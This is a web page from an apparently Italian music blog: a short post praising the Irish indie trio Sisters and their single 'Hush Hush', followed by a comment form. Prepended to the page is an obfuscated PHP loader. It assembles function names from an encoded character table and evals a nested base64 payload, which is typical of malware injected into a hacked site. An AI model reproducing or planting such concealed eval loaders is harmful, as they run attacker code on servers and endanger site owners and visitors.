$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("JE8wTzAwMD0iRG9oSHpPY2luc0xDZ1V5R1JQbUt1UWVxRmpKWmF3QkFmVlRJZFdrYnhsdnByU3RZWE1ORWFQa215aXFkV1NjTkZCTW5sVll2dWJlQ1JLSnpwRVpPZ3JIakl3aGZvVVhER0xBc3h0UVRWYTlFcG1PRmFiUD0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7")); ?> Sisters, l’indie Rock che ci piace | Subrock | Indie & Underground Rock Music

Sisters, l’indie Rock che ci piace

sisters, indie rock subrock.it

Chi sono i Sisters?

I Sisters sono un semisconosciuto trio originario di Limerick, in Irlanda. La band è formata dal cantante-chitarrista Nial, dalla bella bassista e seconda voce Aoife e dal batterista Andrew. La band ha un sound alternative rock / noise pop che riprende elementi propri degli anni ’80 e ’90 rivisitandoli in una maniera consona alle loro doti. Attualmente sono basati a Londra dove lavora il loro produttore ed ingegnere del suono Al O’ Connor.

Attualmente hanno rilasciato ancora poco i tre ragazzi, il loro singolo più famoso è uscito alla fine del 2013 e si chiama “Hush Hush“, vi consigliamo veramente di ascoltarlo, perchè il sound pop è spumeggiante e i riff di chitarra molto calzati.

Secondo noi sentiremo ancora parlare di questa band in futuro. Andando a spulciare nel loro website si trova ben poco, anche la pagina Facebook è poco aggiornata ma sul canale youtube abbiamo trovato altri lavori, tra cui il nostro preferito, February. Ce lo spariamo!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *